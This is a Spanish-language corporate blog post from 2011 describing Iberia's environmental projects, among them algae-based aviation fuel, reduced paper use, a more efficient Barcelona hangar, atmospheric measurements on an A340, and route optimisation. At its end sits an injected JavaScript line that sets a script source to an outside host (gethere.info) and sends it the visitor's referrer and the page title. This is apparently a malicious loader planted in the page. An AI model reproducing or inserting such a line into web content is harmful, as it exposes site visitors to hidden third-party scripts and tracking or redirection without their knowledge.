Iberia vuela verde

10/06/2011

Diez son los proyectos estratégicos que Iberia está poniendo en marcha en 2011. Uno de estos proyectos está ligado a la preservación del medio ambiente, y con él no solo pretendemos mover a toda la organización, sino también involucrar a nuestros clientes, empleados y proveedores.

En 2010 Iberia volvió a sembrar una buena cosecha medio ambiental: fue seleccionada para formar parte del Dow Jones de Sostenibilidad y fue la compañía aérea con mejor desempeño medioambiental. Pero esta cosecha no siempre es visible ni para todos los clientes ni para los grupos de interés de la compañía. De ahí que con este proyecto –Proyecto Medio Ambiente 2011– pretendamos que todas las iniciativas sean conocidas, de primera mano, por todos vosotros.  Algunas de las iniciativas que se engloban dentro de este proyecto son:

  • Combustible de algas. Acabamos de firmar un acuerdo con el Ministerio de Fomento, Airbus y SENASA para apoyar el desarrollo, la producción y el uso sostenible de biocombustibles para la aviación. Y con Algaenergy y AENA vamos a poner en marcha un proyecto de cultivo de microalgas para combustible junto al aeropuerto de Barajas. Estas microalgas se”alimtentarán” de CO2 procedente del banco de prueba de motores y de los vehículos de Iberia y AENA.
  • Consumir menos papel. ¿Cómo? Tenemos en marcha iniciativas para reducir el papel que requieren las tarjetas de embarque emitidas en www.iberia.com, y las confirmaciones de los billetes vendidos en nuestra web, o recordando a todo nuestro equipo evitar impresiones innecesarias.
  • Un hangar más verde. Se pretende obtener la certificación ISO 14001 de Medio Ambiente para el hangar de Barcelona, en cuyo diseño se dio máxima prioridad a obtener la mayor eficiencia posible en cuanto a consumo energético y utilización de fuentes de energía renovables. Además, el hangar dispone de los sistemas más innovadores en cuanto ahorro de energía: tanto para el acondicionamiento térmico como para la climatización de las instalaciones o  la reutilización de aguas residuales y freáticas.
  • Participación en IAGOS (Integración de las mediciones rutinarias de la flota en un sistema global de observación). Es un proyecto científico cuyo objetivo es analizar la calidad de la atmósfera. Equiparíamos uno de los Airbus A340 que vuelan a América Latina con instrumentos científicos para examinar la composición química de la atmósfera y la calidad de la misma. El uso de aviones comerciales en estas pruebas permite recoger datos imposibles de conseguir por métodos alternativos.
  • Volar más limpio: a través de la reducción del peso de los aviones o de la  reasignación de los aeropuertos alternativos por otros más cercanos al destino, para así cargar una menor cantidad de combustible de reserva. También con aterrizajes verdes, aproximaciones de descenso continuo a los aeropuertos: sin trazos horizontales y con regímenes bajos de motor.
  • Rutas más eficientes, a través de DORIS (Optimización Dinámica de la Ruta En Vuelo). Permite optimizar las rutas entre Europa y América, para ganar en eficiencia en el espacio aéreo del Atlántico Norte.

Y otras iniciativas que os iremos contando cuando las pongamos en marcha.

Foto | Dr. Jaus

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;